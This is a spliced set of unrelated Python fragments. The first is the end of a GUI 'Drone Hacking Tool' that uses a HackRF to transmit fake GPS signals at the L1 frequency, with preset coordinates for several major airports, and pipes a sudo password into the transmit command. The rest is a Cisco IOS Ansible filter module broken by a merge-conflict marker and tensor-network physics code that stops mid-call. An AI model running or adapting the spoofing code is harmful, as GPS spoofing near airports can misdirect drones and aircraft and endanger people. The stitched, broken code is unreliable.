self.attack_button.config(text = "Stop attack", image = self.attack_button_stop_icon, command = lambda: self.stop_attack()) except: #If icon not found self.attack_button.config(text = "Stop attack", command = lambda: self.stop_attack()) self.check_log_file = Path(current_path + "/data/hack_drone_log.csv") if self.check_log_file.is_file(): #Check "hack_drone_log.csv" is really exist target_BSSID_log = [""] channel_log = [""] privacy_log = [""] password_log = [""] manufacturer_log = [""] client_BSSID_log = [""] selected_ap_timestamp_log = [show_fake_gps_attack_timestamp] states_log = ["Transmission fake GPS file, latitude: " + self.get_user_type_in_latitude + ", longitude: " + self.get_user_type_in_longitude + ", airport: " + self.user_selected_location] dataframe = pd.DataFrame({"target_BSSID":target_BSSID_log, "channel":channel_log, "privacy":privacy_log, "password":<PASSWORD>, "manufacturer":manufacturer_log, "client_BSSID":client_BSSID_log,"timestamp":selected_ap_timestamp_log, "states":states_log}) dataframe.to_csv(current_path + "/data/hack_drone_log.csv", index = False, sep = ',', mode = "a", header = False) #Write log data to "drone_attack_log.csv" transmission_fake_gps_states = subprocess.Popen("echo " + sudo_password + " | sudo -S hackrf_transfer -t " + current_path + "/driver/GPS_SDR_SIM/gps-sdr-sim/gpssim.bin -f 1575420000 -s 2600000 -a 1 -x 47 -R", stdout = subprocess.PIPE, stderr = subprocess.STDOUT, shell = True) transmission_fake_gps_states.communicate() self.info_label.config(text = "Completed.") self.bace_to_homepage_button.config(state = "normal") self.progressbar.stop() try: self.attack_button.config(text = "Start attack", image = self.attack_button_start_icon, command = lambda: threading.Thread(target = self.check_selection).start()) except: #If icon not found self.attack_button.config(text = "Start attack", command = lambda: threading.Thread(target = self.check_selection).start()) def stop_attack(self): #Stop fake GPS signal transmission if self.user_selected_location == "Customize": subprocess.Popen("ps aux | grep '" + current_path + "/driver/GPS_SDR_SIM/gps-sdr-sim/gpssim.bin -f 1575420000 -s 2600000 -a 1 -x 47' | awk '{print $2}' | xargs sudo kill -9", stdout = subprocess.PIPE, shell = True) #Close fake GPS time.sleep(0.1) self.latitude_inputbox.config(state = "normal") self.longitude_inputbox.config(state = "normal") elif self.user_selected_location == "Hong Kong International Airport": self.check_fake_gps_file = Path(current_path + "/driver/GPS_SDR_SIM/gps-sdr-sim/hong_kong_international_airport.bin") if self.check_fake_gps_file.is_file(): subprocess.Popen("ps aux | grep '" + current_path + "/driver/GPS_SDR_SIM/gps-sdr-sim/hong_kong_international_airport.bin -f 1575420000 -s 2600000 -a 1 -x 47' | awk '{print $2}' | xargs sudo kill -9", stdout = subprocess.PIPE, shell = True) #Close fake GPS else: subprocess.Popen("ps aux | grep '" + current_path + "/driver/GPS_SDR_SIM/gps-sdr-sim/gpssim.bin -f 1575420000 -s 2600000 -a 1 -x 47' | awk '{print $2}' | xargs sudo kill -9", stdout = subprocess.PIPE, shell = True) #Close fake GPS elif self.user_selected_location == "Frankfurt Airport": self.check_fake_gps_file = Path(current_path + "/driver/GPS_SDR_SIM/gps-sdr-sim/frankfurt_airport.bin") if self.check_fake_gps_file.is_file(): subprocess.Popen("ps aux | grep '" + current_path + "/driver/GPS_SDR_SIM/gps-sdr-sim/frankfurt_airport.bin -f 1575420000 -s 2600000 -a 1 -x 47' | awk '{print $2}' | xargs sudo kill -9", stdout = subprocess.PIPE, shell = True) #Close fake GPS else: subprocess.Popen("ps aux | grep '" + current_path + "/driver/GPS_SDR_SIM/gps-sdr-sim/gpssim.bin -f 1575420000 -s 2600000 -a 1 -x 47' | awk '{print $2}' | xargs sudo kill -9", stdout = subprocess.PIPE, shell = True) #Close fake GPS elif self.user_selected_location == "Kansai International Airport": self.check_fake_gps_file = Path(current_path + "/driver/GPS_SDR_SIM/gps-sdr-sim/kansai_international_airport.bin") if self.check_fake_gps_file.is_file(): subprocess.Popen("ps aux | grep '" + current_path + "/driver/GPS_SDR_SIM/gps-sdr-sim/kansai_international_airport.bin -f 1575420000 -s 2600000 -a 1 -x 47' | awk '{print $2}' | xargs sudo kill -9", stdout = subprocess.PIPE, shell = True) #Close fake GPS else: subprocess.Popen("ps aux | grep '" + current_path + "/driver/GPS_SDR_SIM/gps-sdr-sim/gpssim.bin -f 1575420000 -s 2600000 -a 1 -x 47' | awk '{print $2}' | xargs sudo kill -9", stdout = subprocess.PIPE, shell = True) #Close fake GPS elif self.user_selected_location == "Singapore Changi Airport": self.check_fake_gps_file = Path(current_path + "/driver/GPS_SDR_SIM/gps-sdr-sim/singapore_changi_airport.bin") if self.check_fake_gps_file.is_file(): subprocess.Popen("ps aux | grep '" + current_path + "/driver/GPS_SDR_SIM/gps-sdr-sim/singapore_changi_airport.bin -f 1575420000 -s 2600000 -a 1 -x 47' | awk '{print $2}' | xargs sudo kill -9", stdout = subprocess.PIPE, shell = True) #Close fake GPS else: subprocess.Popen("ps aux | grep '" + current_path + "/driver/GPS_SDR_SIM/gps-sdr-sim/gpssim.bin -f 1575420000 -s 2600000 -a 1 -x 47' | awk '{print $2}' | xargs sudo kill -9", stdout = subprocess.PIPE, shell = True) #Close fake GPS else: subprocess.Popen("ps aux | grep '" + current_path + "/driver/GPS_SDR_SIM/gps-sdr-sim/gpssim.bin -f 1575420000 -s 2600000 -a 1 -x 47' | awk '{print $2}' | xargs sudo kill -9", stdout = subprocess.PIPE, shell = True) #Close fake GPS time.sleep(0.1) subprocess.Popen("hackrf_info", stdout = subprocess.PIPE, stderr = subprocess.STDOUT, shell = True, universal_newlines = True).stdout #Just for refresh PortaPack screen self.bace_to_homepage_button.config(state = "normal") self.progressbar.stop() def destroy_rf_attack_gui(self): self.title_label.destroy() self.world_map_display_label.destroy() self.location_select_list.destroy() self.latitude_label.destroy() self.latitude_inputbox.destroy() self.latitude_label_latitude_inputbox_frame.destroy() self.longitude_label.destroy() self.longitude_inputbox.destroy() self.longitude_label_longitude_inputbox_frame.destroy() self.progressbar.destroy() self.info_label.destroy() self.bace_to_homepage_button.destroy() self.attack_button.destroy() self.footer_frame.destroy() self.messagebox_tips_state = True self.controller.show_frame("StartPage") if __name__ == "__main__": app = SampleApp() app.title("Drone Hacking Tool") app.geometry("850x800+200+200") app.resizable(False, False) try: #Set windows icon app.iconphoto(True, tk.PhotoImage(file = current_path + "/data/gui_img/drone_main_icon.png")) except: pass print(" P100 CEEFAX 1 100 Mon 13 Jun 19:27/35 ") print(" █████████████████ ████████████ ") print(" ████████ █████ █ █ █ ") print(" ████████ █████ █ ██████████ █ ███████ █████████████████ ") print(" ████████ █████ █ █ █ █ ███████ █ ████ ████████ ") print(" ████████ █ █ █████ █ █ ███████ █ ███ █████████ ") print(" ████████ █████ █ █ █████ █ █ ███████ █ ██ ██████████ ") print(" ████████ █████ █ █ █ █ ███████ █ ███████████ ") print(" ████████ █████ █ █ █████ █ █ ███████ █ ██ ██████████ ") print(" ████████ █████ █ █ █████ █ █ █ █ ███ █████████ ") print(" █████████████████ █ █████ █ ██████████ █ ████ ████████ ") print(" █ █████ █ █ ████ ████████ ") print(" ████████████ ███████████████████ ") print(" Ver: 1.1.2.111 ") print(" ░░░░░░░░ ░░░░░░░░ ░░░░░░░░ ░░░░░░░░ ░░░░░░░░ ") print(" ░ ░░░ ░ ░░ ░ ░ ░ ░░░░ ░ ░ ░ ") print(" ░ ░░░ ░░ ░ ░░░░ ░ ░ ░░░░ ░ ░ ░░░ ░ ░ ░░░░░░ ") print(" ░ ░░░░ ░ ░ ░░ ░ ░░░░ ░ ░ ░ ░░ ░ ░ ░░ ") print(" ░ ░░░░ ░ ░ ░░░░ ░ ░ ░░░░ ░ ░ ░░ ░ ░ ░ ░░░░░░ ") print(" ░ ░░░ ░░ ░ ░░░░ ░ ░ ░░░░ ░ ░
___ ___ _____ ___ _____ ___ __ __ ___ _____ _ _ ___ ___ ___ # | _ \ _ \_ _\ \ / /_\_ _| __| | \/ | __|_ _| || |/ _ \| \/ __| # | _/ /| | \ V / _ \| | | _| | |\/| | _| | | | __ | (_) | |) \__ \ # |_| |_|_\___| \_/_/ \_\_| |___| |_| |_|___| |_| |_||_|\___/|___/|___/ # # ------------------------------------------------------------------------- def __parse_data_files(self, lines, **kwargs): ''' __ios_parse_data_files Args: lines: contains the output of the dir of that specific kwargs: passing keyword ( or named) arguments ''' if self.debug: self.dp.v_debug(">>> Start of " + self.__who_am_i()) new_list = [] runfile = re.escape(kwargs['running_ios']) rundir = re.escape(kwargs['running_dir']) reqdir = re.escape(kwargs['required_dir']) f = re.escape(kwargs['filter']) for line in lines: line = line.strip() # Remove leading and trailing spaces # Build conditional to ignore the running IOS binary file, # if exist. cond1 = re.match('^[0-9]+\\s+(-rw).*\\s+(' + runfile + ')$', line) # Build conditional to ignore the directories that contains the # name of the running IOS and required IOS, if exist. cond2 = re.match( '^[0-9]+\\s+(drw).*\\s+(' + rundir + '|' + reqdir + ')$', line) # Build conditional to keep files and directories that contains the # model variant name that is extracted from the required IOS. cond3 = re.match('^[0-9]+\\s+.*\\s+(' + f + ').*$', line) if (not (cond1 or cond2)) and cond3: if self.debug: self.dp.v_debug("Found line: " + line) # End of if self.debug: new_list.append(line.split()[-1]) # End of if (not (cond1 and cond2)) and cond3: # End of for line in lines: if self.debug: self.dp.v_debug("<<< End of " + self.__who_am_i()) return new_list ''' End of def __parse_data_files(lines, **kwargs): ''' def __parse_filefolder(self, lines, source, mtype, from_function): ''' __parse_filefolder Args: data: contains the output from the used Cisco command source: name of file or folder mtype: file/folder to filter on from_function: passing the function name ''' result = None s = re.escape(source) p = re.escape(mtype) for line in lines: line = line.strip() # Remove leading and trailing spaces cond = re.match('^[0-9]+\\s+' + p + '.*' + s + '$', line) if cond: if self.debug: self.dp.v_debug( "(" + from_function + ") Found line: " + line) # End of if self.debug result = line.split()[-1] # End of if cond cond2 = re.match('^(No files in directory)$', line) if cond2: if self.debug: message = "(" + from_function + ") Found line: " + \ "'No files in directory'" self.dp.v_debug(message) # End of if self.debug result = None # End of if cond2: # End of for line in lines: if self.debug: message = "(" + from_function + ") " + str(type(result)) message += " result = " + str(result) self.dp.v_debug(message) # End of if self.debug return result ''' End of def __parse_filefolder(lines, source, mtype, from_function): ''' def __parse_filesystem_space(self, lines): ''' __parse_filesystem_space Args: data: contains the output from the used Cisco command ''' data_dict = {} if self.debug: self.dp.v_debug(">>> Start of " + self.__who_am_i()) for line in lines: line = line.strip() # Remove leading and trailing spaces cond1 = re.match( '^[0-9]*\\s(bytes available).*', line) cond2 = re.match( '^[0-9]*\\s(bytes total).*', line) if cond1: if self.debug: message = "(" + self.__who_am_i() + ") Found line: " + line self.dp.v_debug(message) # End of if self.debug: free_kb = round( int( re.sub( '\\s+(bytes available)\\s+.*', '', line)) / 1000) used_kb = round(int( re.sub('.*\\(([0-9]+?)\\s(bytes used)\\)', '\\1', line) ) / 1000) data_dict['total_kb'] = free_kb + used_kb data_dict['free_kb'] = int(free_kb) # End of if cond1: elif cond2: if self.debug: message = "(" + self.__who_am_i() + ") Found line: " + line self.dp.v_debug(message) # End of if self.debug: total_kb = round( int(re.sub('\\s+(bytes total)\\s+.*', '', line)) / 1000) free_kb = round( int( re.sub( '.*\\(([0-9]+?)\\s(bytes free).*\\)', '\\1', line) ) / 1000) data_dict['total_kb'] = int(total_kb) data_dict['free_kb'] = int(free_kb) # End of elif cond2: # End of for line in lines: if self.debug: self.dp.v_debug("(" + self.__who_am_i() + ") data_dict = ") pprint(data_dict) self.dp.v_debug("<<< End of " + self.__who_am_i()) return data_dict ''' End of def __parse_filesystem_space(self, lines): ''' def __parse_find_file(self, item_object, key, label=None): ''' __parse_find_file Args: item_object: passing object key: passing key name label: passing label to find ''' rvalue = None if self.debug: self.dp.v_debug(">>> Start of " + self.__who_am_i()) if isinstance(item_object[key], dict): if self.debug: message = "(" + self.__who_am_i() + ") The variable item[" + \ key + "] is a dictionary." self.dp.v_debug(message) # End of if self.debug: if label in item_object[key]: rvalue = item_object[key][label] if self.debug: message = "(" + self.__who_am_i() + \ ") The dictionary item[" + key message += "] contains the key '" + label + "'." self.dp.v_debug(message) self.dp.v_debug(("(" + self.__who_am_i() + ") " "" + label + " = " + rvalue)) # End of if self.debug: # End of if label in item_object[key]: # End of if isinstance(item_object[key], dict): elif isinstance(item_object[key], list): if self.debug: message = "(" + self.__who_am_i() + ") The variable item['" + \ key + "'] is a list." self.dp.v_debug(message) # End of if self.debug: rvalue = item_object[key][0].split('\n') elif isinstance(item_object[key], str): if self.debug: message = "(" + self.__who_am_i() + ") The variable item['" + \ key + "'] is a string." self.dp.v_debug(message) # End of if self.debug: rvalue = item_object[key] # End of elif isinstance(item_object[key], str): if self.debug: self.dp.v_debug("<< < End of " + self.__who_am_i()) return rvalue ''' End of def __parse_find_file(item_object, key, label=None)''' # ███╗ ███████╗ ███╗ # ██╔╝ ██╔════╝ ╚██║ # ██║ ███████╗ ██║ # ██║ ╚════██║ ██║ # ███╗ ███████║ ███║ # ╚══╝ ╚══════╝ ╚══╝ def __stdout(self, data, from_method): ''' __stdout Determine if the passed variable 'data' is a list or string. Args: data: command output result from_method: method name ''' raw_list = [] # Initialize an empty list if isinstance(data, str): # The variable 'data' is a string if self.debug: message = "(" + from_method + \ ") The argument 'data' is a string." self.dp.v_debug(message) # End of if self.debug: # Split a string into a list using newline as separator raw_list = data.split("\n") else: message = "(" + from_method + ") The passed argument 'data' is " message += "not a list nor string." self.dp.v_error(message) self.error = True # End of if isinstance(data, list): return raw_list ''' End of def __stdout(data, from_method): ''' def __who_am_i(self): return inspect.stack()[1][3] ======= #!/usr/bin/env python import inspect import re from pprint import pprint # require pip install --upgrade pandas import pandas as pd # ██╗ ██╗███████╗██████╗ ██████╗ ██████╗ ███████╗██╗████████╗██╗ ██╗ # ██║ ██║██╔════╝██╔══██╗██╔══██╗██╔═══██╗██╔════╝██║╚══██╔══╝╚██╗ ██╔╝ # ██║ ██║█████╗ ██████╔╝██████╔╝██║ ██║███████╗██║ ██║ ╚████╔╝ # ╚██╗ ██╔╝██╔══╝ ██╔══██╗██╔══██╗██║ ██║╚════██║██║ ██║ ╚██╔╝ # ╚████╔╝ ███████╗██║ ██║██████╔╝╚██████╔╝███████║██║ ██║ ██║ # ╚═══╝ ╚══════╝╚═╝ ╚═╝╚═════╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═╝ class Verbosity: ''' class Verbosity Provide a colorfull output to make it better visible ''' # Private variables __red = '\033[31m' __green = '\033[32m' __orange = '\033[33m' __blue = '\033[34m' __purple = '\033[35m' __cyan = '\033[36m' __lightgrey = '\033[37m' __darkgrey = '\033[90m' __lightred = '\033[91m' __lightgreen = '\033[92m' __yellow = '\033[93m' __lightblue = '\033[94m' __pink = '\033[95m' __lightcyan = '\033[96m' __reset = '\033[0m' def __init__(self, **args): ''' Constructor Is a reserved method in Python classes. This method called when an object is created from the class and it allow the class to initialize the attributes of a class ''' self.message = None self.error = False super(Verbosity, self).__init__() ''' End of def __init__(self, **args): ''' def v_debug(self, message): ''' Display an error message ''' print(self.__purple + '[DEBUG] ' + self.__reset + message) def v_error(self, message): ''' Display an error message ''' print(self.__red + '[ERROR] ' + self.__reset + message) # ███████╗██╗██╗ ████████╗███████╗██████╗ # ██╔════╝██║██║ ╚══██╔══╝██╔════╝██╔══██╗ # █████╗ ██║██║ ██║ █████╗ ██████╔╝ # ██╔══╝ ██║██║ ██║ ██╔══╝ ██╔══██╗ # ██║ ██║███████╗██║ ███████╗██║ ██║ # ╚═╝ ╚═╝╚══════╝╚═╝ ╚══════╝╚═╝ ╚═╝ # ███╗ ███╗ ██████╗ ██████╗ ██╗ ██╗██╗ ███████╗ # ████╗ ████║██╔═══██╗██╔══██╗██║ ██║██║ ██╔════╝ # ██╔████╔██║██║ ██║██║ ██║██║ ██║██║ █████╗ # ██║╚██╔╝██║██║ ██║██║ ██║██║ ██║██║ ██╔══╝ # ██║ ╚═╝ ██║╚██████╔╝██████╔╝╚██████╔╝███████╗███████╗ # ╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚══════╝ class FilterModule(object): def __init__(self): self.dp = Verbosity() self.debug = False self.error = False def filters(self): return
np.prod([N.ten.shape[i] for i in N.legs[2]]) n4 = np.prod([N.ten.shape[i] for i in N.legs[3]]) Nmat = N.backend.reshape(N.ten,(n1*n2,n3*n4)) u,v = N.backend.eigh(Nmat) u = pos_sqrt_vec(u) Nmat = N.backend.einsum('ij,j,kj->ik',v,u,v) N.ten = Nmat.reshape(N.shape) N = N.transpose([0,2,1,3]) else: N = N.copy().transpose([0,2,1,3]) Nmat = N.ten.make_sparse() (N1,N2,N3,N4,n1,n2,n3,n4) = Nmat.shape Nmat = Nmat.transpose([0,4,1,5,2,6,3,7]) Nmat = Nmat.reshape((N1*n1*N2*n2,N3*n3*N4*n4)) u,v = N.backend.eigh(Nmat) u = pos_sqrt_vec(u) Nmat = N.backend.einsum('ij,j,kj->ik',v,u,v) Nmat = Nmat.reshape((N1,n1,N2,n2,N3,n3,N4,n4)) Nmat = Nmat.transpose([0,2,4,6,1,3,5,7]) # Cast back into a symtensor delta = N.ten.get_irrep_map() Nmat = N.backend.einsum('ABCDabcd,ABCD->ABCabcd',Nmat,delta) N.ten.array = Nmat # Retranspose N = N.transpose([0,2,1,3]) else: if N.sym is None: N = N.transpose([0,2,4,6,8,10,1,3,5,7,9,11]) n0 = np.prod([N.ten.shape[i] for i in N.legs[0]]) n1 = np.prod([N.ten.shape[i] for i in N.legs[1]]) n2 = np.prod([N.ten.shape[i] for i in N.legs[2]]) n3 = np.prod([N.ten.shape[i] for i in N.legs[3]]) n4 = np.prod([N.ten.shape[i] for i in N.legs[4]]) n5 = np.prod([N.ten.shape[i] for i in N.legs[5]]) n6 = np.prod([N.ten.shape[i] for i in N.legs[6]]) n7 = np.prod([N.ten.shape[i] for i in N.legs[7]]) n8 = np.prod([N.ten.shape[i] for i in N.legs[8]]) n9 = np.prod([N.ten.shape[i] for i in N.legs[9]]) n10 = np.prod([N.ten.shape[i] for i in N.legs[10]]) n11 = np.prod([N.ten.shape[i] for i in N.legs[11]]) Nmat = N.backend.reshape(N.ten,(n0*n1*n2*n3*n4*n5,n6*n7*n8*n9*n10*n11)) u,v = N.backend.eigh(Nmat) u = pos_sqrt_vec(u) Nmat = N.backend.einsum('ij,j,kj->ik',v,u,v) N.ten = Nmat.reshape(N.shape) N = N.transpose([0,6,1,7,2,8,3,9,4,10,5,11]) else: N = N.copy().transpose([0,2,4,6,8,10,1,3,5,7,9,11]) Nmat = N.ten.make_sparse() (N0,N1,N2,N3,N4,N5,N6,N7,N8,N9,N10,N11,n0,n1,n2,n3,n4,n5,n6,n7,n8,n9,n10,n11) = Nmat.shape Nmat = Nmat.transpose([0,12,1,13,2,14,3,15,4,16,5,17,6,18,7,19,8,20,9,21,10,22,11,23]) Nmat = Nmat.reshape((N0*n0*N1*n1*N2*n2*N3*n3*N4*n4*N5*n5,N6*n6*N7*n7*N8*n8*N9*n9*N10*n10*N11*n11)) u,v = N.backend.eigh(Nmat) u = pos_sqrt_vec(u) Nmat = N.backend.einsum('ij,j,kj->ik',v,u,v) Nmat = Nmat.reshape((N0,n0,N1,n1,N2,n2,N3,n3,N4,n4,N5,n5,N6,n6,N7,n7,N8,n8,N9,n9,N10,n10,N11,n11)) Nmat = Nmat.transpose([0,2,4,6,8,10,12,14,16,18,20,22,1,3,5,7,9,11,13,15,17,19,21,23]) delta = N.ten.get_irrep_map() Nmat = N.backend.einsum('ABCDEFGHIJKLabcdefghijkl,ABCDEFGHIJKL->ABCDEFGHIJKabcdefghijkl',Nmat,delta) N.ten.array = Nmat N = N.transpose([0,6,1,7,2,8,3,9,4,10,5,11]) except Exception as e: mpiprint(0,'Failed to make N positive:\n\t{}'.format(e)) return N #@profile def calc_local_env(bra1,bra2,ket1,ket2,env_top,env_bot,lbmpo,rbmpo, reduced=True,hermitian=True,positive=True,in_mem=True): """ Calculate the local environment around two peps tensors Args: bra1 : peps tensor The peps tensor for the bottom site bra2 : peps tensor The peps tensor for the top site ket1 : peps tensor The peps tensor for the bottom site ket2 : peps tensor The peps tensor for the top site env_top : env tensor The top environment for the given sites env_bot : env tensor The bottom environment for the given sites lbmpo : list of left boundary mpo tensors The four left boundary mpo tensors surrounding the two peps tensors rbmpo : list of right boundary mpo tensors The four right boundary mpo tensors surrounding the two peps tensors Kwargs: reduced : bool If true, then this function returns the reduced environment. Currently, this is the only option available. hermitian : bool Approximate the environment with its nearest hermitian approximate positive : bool Approximate the environment with its nearest possible positive approximate in_mem : bool Whether the tensors input to this function are in memory. If not, tensors should be loaded first (and rewritten to disk afterwards). The output of this funciton, i.e. the local env, will always be in memory. """ # Load tensors (as needed) if not in_mem: bra1.from_disk() bra2.from_disk() ket1.from_disk() ket2.from_disk() if env_top is not None: env_top.from_disk() if env_bot is not None: env_bot.from_disk() for i in range(len(lbmpo)): lbmpo[i].from_disk() for i in range(len(rbmpo)): rbmpo[i].from_disk() if reduced: # Get reduced tensors peps_b,phys_b,phys_t,peps_t = reduce_tensors(bra1,bra2) ket_b,phys_bk,phys_tk,ket_t = reduce_tensors(ket1,ket2) # Compute bottom half of environment if env_bot is None: tmp = einsum('CLB,LDRU->CDBUR',lbmpo[0],peps_b).remove_empty_ind(0).remove_empty_ind(0) tmp = einsum('BUR,cRb->cBUb',tmp,rbmpo[0]).remove_empty_ind(0) tmp = einsum('BUb,BlA->AlUb',tmp,lbmpo[1]) tmp = einsum('AlUb,ldru->dAurUb',tmp,ket_b).remove_empty_ind(0) envb= einsum('AurUb,bra->AuUa',tmp,rbmpo[1]) else: tmp = einsum('CdDc,CLB->BLdDc',env_bot,lbmpo[0]) tmp = einsum('BLdDc,LDRU->BdURc',tmp,peps_b) tmp = einsum('BdURc,cRb->BdUb',tmp,rbmpo[0]) tmp = einsum('BdUb,BlA->AldUb',tmp,lbmpo[1]) tmp = einsum('AldUb,ldru->AurUb',tmp,ket_b) envb= einsum('AurUb,bra->AuUa',tmp,rbmpo[1]) # Compute top half of environment if env_top is None: tmp = einsum('BlC,ldru->CuBdr',lbmpo[3],ket_t).remove_empty_ind(0).remove_empty_ind(0) tmp = einsum('Bdr,brc->cBdb',tmp,rbmpo[3]).remove_empty_ind(0) tmp = einsum('Bdb,ALB->ALdb',tmp,lbmpo[2]) tmp = einsum('ALdb,LDRU->UAdDRb',tmp,peps_t).remove_empty_ind(0) envt= einsum('AdDRb,aRb->AdDa',tmp,rbmpo[2]) else: tmp = einsum('CuUc,BlC->BluUc',env_top,lbmpo[3]) tmp = einsum('BluUc,ldru->BdrUc',tmp,ket_t) tmp = einsum('BdrUc,brc->BdUb',tmp,rbmpo[3]) tmp = einsum('BdUb,ALB->ALdUb',tmp,lbmpo[2]) tmp = einsum('ALdUb,LDRU->AdDRb',tmp,peps_t) envt= einsum('AdDRb,aRb->AdDa',tmp,rbmpo[2]) # Compute Environment N = einsum('AdDa,AuUa->uUdD',envt,envb) N = make_N_positive(N,hermitian=hermitian,positive=positive) # write tensors to disk (as needed) if not in_mem: bra1.to_disk() bra2.to_disk() ket1.to_disk() ket2.to_disk() if env_top is not None: env_top.to_disk() if env_bot is not None: env_bot.to_disk() for i in range(len(lbmpo)): lbmpo[i].to_disk() for i in range(len(rbmpo)): rbmpo[i].to_disk() # Return Results return peps_b, phys_b, phys_t, peps_t, ket_b, phys_bk, phys_tk, ket_t, N else: # Get the PEPS tensors peps_b, peps_t = bra1, bra2 ket_b, ket_t = ket1, ket2 # Compute bottom half of environment if env_bot is None: if lbmpo[0].is_symmetric: # Must determine correct signs for empty tensor (a bit overly complicated) symtmp = einsum('CLB,BlA->CLlA',lbmpo[0],lbmpo[1]) symtmp = einsum('LDPRU,CLlA->DPRUClA',peps_b,symtmp) symtmp = einsum('cRb,DPRUClA->DPUClAcb',rbmpo[0],symtmp) symtmp = einsum('bra,DPUClAcb->DPUClAcra',rbmpo[1],symtmp) symtmp = einsum('ldPru,DPUClAcra->CdDcAuUa',ket_b,symtmp) # Create an empty environment env_bot = ones((1,1,1,1), sym=[symtmp.sym[0][:4], symtmp.sym[1][:4], None, None], backend=lbmpo[0]. backend,dtype=lbmpo[0].dtype) else: # Create an empty environment env_bot = ones((1,1,1,1), sym=None, backend=lbmpo[0].backend, dtype=lbmpo[0].dtype) # Contract bottom half of environment tmp = einsum('CdDc,CLB->BLdDc',env_bot,lbmpo[0]) tmp = einsum('BLdDc,cRb->BLdDRb',tmp,rbmpo[0]) tmp = einsum('BLdDRb,BlA->AlLdDRb',tmp,lbmpo[1]) envb = einsum('AlLdDRb,bra->AlLdDrRa',tmp,rbmpo[1]) # Compute top half of environment if env_top is None: if lbmpo[3].is_symmetric: # Must determine correct signs for empty tensor (a bit overly complicated) symtmp = einsum('ALB,BlC->ALlC',lbmpo[2],lbmpo[3]) symtmp = einsum('LDPRU,ALlC->DPRUAlC',peps_t,symtmp) symtmp = einsum('aRb,DPRUAlC->DPUAlCab',rbmpo[2],symtmp) symtmp = einsum('brc,DPUAlCab->DPUAlCarc',rbmpo[3],symtmp) symtmp = einsum('ldPru,DPUAlCarc->CuUcDaAd',ket_t,symtmp) # Create an empty environment env_top = ones((1,1,1,1), sym=[symtmp.sym[0][:4], symtmp.sym[1][:4], None, None], backend=lbmpo[0].backend, dtype=lbmpo[0].dtype) else: # Create an empty environment env_top = ones((1,1,1,1), sym=None, backend=lbmpo[0].backend,dtype=lbmpo[0].dtype) tmp = einsum('CuUc,BlC->BluUc',env_top,lbmpo[3]) tmp = einsum('BluUc,brc->BluUrb',tmp,rbmpo[3]) tmp = einsum('BluUrb,ALB->ALluUrb',tmp,lbmpo[2]) envt = einsum('ALluUrb,aRb->AlLuUrRa',tmp,rbmpo[2]) # Compute Environment N = einsum('AkKuUsSa,AlLdDrRa->lLdDrRkKuUsS',envt,envb) N = make_N_positive(N, hermitian=hermitian, positive=positive, reduced=reduced) # write tensors to disk (as needed) if not in_mem: bra1.to_disk() bra2.to_disk() ket1.to_disk() ket2.to_disk() if env_top is not None: env_top.to_disk() if env_bot is not None: env_bot.to_disk() for i in range(len(lbmpo)): lbmpo[i].to_disk() for i in range(len(rbmpo)): rbmpo[i].to_disk() # Return Results return N def calc_local_op(phys_b_bra,phys_t_bra,N,ham, phys_b_ket=None,phys_t_ket=None, reduced=True,normalize=True,return_norm=False): """ Calculate the normalized Energy of the system """ # Make some copies if phys_t_ket is None: phys_t_ket = phys_t_bra.copy().conj() if phys_b_ket is None: phys_b_ket = phys_b_bra.copy().conj() # Compute Energy (or op value if reduced: tmp = einsum('APU,UQB->APQB',phys_b_bra,phys_t_bra) tmp1= einsum('APQB,aAbB->aPQb',tmp,N) tmp2= einsum('apu,uqb->apqb',phys_b_ket,phys_t_ket) norm = einsum('apqb,apqb->',tmp1,tmp2) if ham is not None: tmp = einsum('aPQb,apqb->PQpq',tmp1,tmp2) if len(tmp.legs[0]) == 2: # Thermal state tmp.unmerge_ind(3) tmp.unmerge_ind(2) tmp.unmerge_ind(1) tmp.unmerge_ind(0) E = einsum('PaQbpaqb,PQpq->',tmp,ham) tmp.merge_inds([0,1]) tmp.merge_inds([1,2]) tmp.merge_inds([2,3]) tmp.merge_inds([3,4]) else: # Normal peps E = einsum('PQpq,PQpq->',tmp,ham) else: E = norm else: # (Bra is capital, ket is lower case) comb1 = einsum('LDPRZ,KZQSU->LDPRKQSU', phys_b_bra, phys_t_bra) comb1 = einsum('LDPRKQSU,lLdDrRkKuUsS->PQldrkus', comb1, N) comb2 = einsum('ldprz,kzqsu->ldprkqsu', phys_b_ket, phys_t_ket) norm = einsum('PQldrkus,ldPrkQsu->', comb1, comb2) if ham is not None: phys_inds = einsum('PQldrkus,ldprkqsu->PQpq', comb1, comb2) if len(phys_inds.legs[0]) == 2: # Thermal state phys_inds.unmerge_ind(3) phys_inds.unmerge_ind(2) phys_inds.unmerge_ind(1) phys_inds.unmerge_ind(0) E = einsum('PaQbpaqb,PQpq->', phys_inds, ham) phys_inds.merge_inds([0,1]) phys_inds.merge_inds([1,2]) phys_inds.merge_inds([2,3]) phys_inds.merge_inds([3,4]) else: # Normal peps E = einsum('PQpq,PQpq->', phys_inds, ham) else: E = norm # Return Result if normalize: if return_norm: return E/norm,norm else: return E/norm else: if return_norm: return E,norm else: return E def calc_N(row,bra_col,left_bmpo,right_bmpo,top_envs,bot_envs,hermitian=True,positive=True,ket_col=None,in_mem=True,reduced=True): """ Calculate the environment tensor """ # Copy bra if needed _ket_col = ket_col if ket_col is None: ket_col = [None]*len(bra_col) for i in range(len(ket_col)): ket_col[i] = bra_col[i].copy() # Compute Local Environment (N) if row == 0: if len(bra_col) == 2: # Only two sites in column, use identity at both ends res = calc_local_env(bra_col[row], bra_col[row+1], ket_col[row], ket_col[row+1], None, None, left_bmpo[row*2,row*2+1,row*2+2,row*2+3], right_bmpo[row*2,row*2+1,row*2+2,row*2+3], hermitian=hermitian, positive=positive, in_mem=in_mem, reduced=reduced) else: # Identity only on bottom res = calc_local_env(bra_col[row], bra_col[row+1], ket_col[row], ket_col[row+1], top_envs[row+2], None, left_bmpo[row*2,row*2+1,row*2+2,row*2+3], right_bmpo[row*2,row*2+1,row*2+2,row*2+3], hermitian=hermitian, positive=positive, in_mem=in_mem, reduced=reduced) elif row == len(bra_col)-2: # Identity needed on top res = calc_local_env(bra_col[row], bra_col[row+1], ket_col[row], ket_col[row+1], None, bot_envs[row-1], left_bmpo[row*2,row*2+1,row*2+2,row*2+3], right_bmpo[row*2,row*2+1,row*2+2,row*2+3], hermitian=hermitian, positive=positive, in_mem=in_mem, reduced=reduced) else: # Get the local environment tensor (no identity needed) res = calc_local_env(bra_col[row], bra_col[row+1], ket_col[row], ket_col[row+1], top_envs[row+2], bot_envs[row-1], left_bmpo[row*2,row*2+1,row*2+2,row*2+3], 